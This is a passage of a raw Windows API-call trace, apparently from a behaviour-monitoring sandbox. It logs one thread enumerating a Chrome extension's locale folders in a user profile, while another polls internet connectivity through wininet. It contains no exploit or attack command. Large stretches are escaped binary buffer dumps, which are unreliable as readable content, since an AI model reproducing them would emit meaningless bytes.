\xa0\xa5l\xe0\x91\xcf\x01\xf0=Om\xe0\x91\xcf\x01\x90\xbc3m\xe0\x91\xcf\x01\xf0=Om\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x007\x00_\x001\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,531 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,611 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:32,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xa0\xa5l\xe0\x91\xcf\x01\xf0=Om\xe0\x91\xcf\x01\x90\xbc3m\xe0\x91\xcf\x01\xf0=Om\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0p\x00\x00\x00\x00\x00\x00\x00 \xa0\xa5l\xe0\x91\xcf\x01\x90\xbc3m\xe0\x91\xcf\x01\x90\xbc3m\xe0\x91\xcf\x01\x90\xbc3m\xe0\x91\xcf\x01 \x17\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x002\x008\x00.\x00p\x00n\x00g\x00c\x00k\x00x\x00\x00\x00\x00\x00\x00\x00\x80\xed"m\xe0\x91\xcf\x01`52m\xe0\x91\xcf\x01`52m\xe0\x91\xcf\x01`52m\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:32,611 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,701 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:32,701 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xb4l\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00C\x00N\x00h\x00\x00\x00\x00\x00\x00\x00P\x9a\xbfl\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00r\x00_\x00T\x00W\x00h\x00\x00\x00\x00\x00\x00\x00\x80!\xc1l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xb0\xa8\xc2l\xe0\x91\xcf\x01\xb0\xa8\xc2l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,711 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,792 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\ar\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,792 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x9a\xbfl\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00P\x9a\xbfl\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x018\x01\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,792 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,792 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,872 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\bg\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,872 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80!\xc1l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xb0\xa8\xc2l\xe0\x91\xcf\x01\xb0\xa8\xc2l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa8\xc2l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01$\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,872 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,872 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,922 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:32,922 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:32,922 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:32,922 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:32,922 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:33,152 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\ca\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,152 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xa8\xc2l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xb0\xa8\xc2l\xe0\x91\xcf\x01\xb0\xa8\xc2l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa8\xc2l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,152 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,152 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,232 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\cs\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,232 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0/\xc4l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xe0/\xc4l\xe0\x91\xcf\x01\xe0/\xc4l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xe0/\xc4l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xf9\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,232 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,232 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,312 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\da\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,312 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xb7\xc5l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\x10\xb7\xc5l\xe0\x91\xcf\x01\x10\xb7\xc5l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x10\xb7\xc5l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xec\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,312 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,312 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,392 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\de\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,392 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xb7\xc5l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\x10\xb7\xc5l\xe0\x91\xcf\x01\x10\xb7\xc5l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x10\xb7\xc5l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xef\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,392 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,392 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,473 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\el\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,473 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@>\xc7l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01@>\xc7l\xe0\x91\xcf\x01@>\xc7l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00@>\xc7l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01L\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,473 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,473 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,553 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\en\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,553 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@>\xc7l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xa0L\xcal\xe0\x91\xcf\x01\xa0L\xcal\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xa0L\xcal\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xd7\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,553 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,553 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,633 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\es\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,633 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0L\xcal\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xa0L\xcal\xe0\x91\xcf\x01\xa0L\xcal\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xa0L\xcal\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01 \x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,633 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,633 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,713 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\fi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xd3\xcbl\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\x00[\xcdl\xe0\x91\xcf\x01\x00[\xcdl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00[\xcdl\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,713 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,723 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:33,723 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:33,723 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:33,723 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:33,723 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:33,793 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\fil\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00[\xcdl\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\x00[\xcdl\xe0\x91\xcf\x01\x00[\xcdl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00[\xcdl\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xea\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,793 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,873 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\fr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,873 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00[\xcdl\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x010\xe2\xcel\xe0\x91\xcf\x010\xe2\xcel\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x000\xe2\xcel\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\x0c\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,873 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,873 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:33,953 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\hi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:33,953 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xe2\xcel\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x010\xe2\xcel\xe0\x91\xcf\x010\xe2\xcel\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x000\xe2\xcel\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01!\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 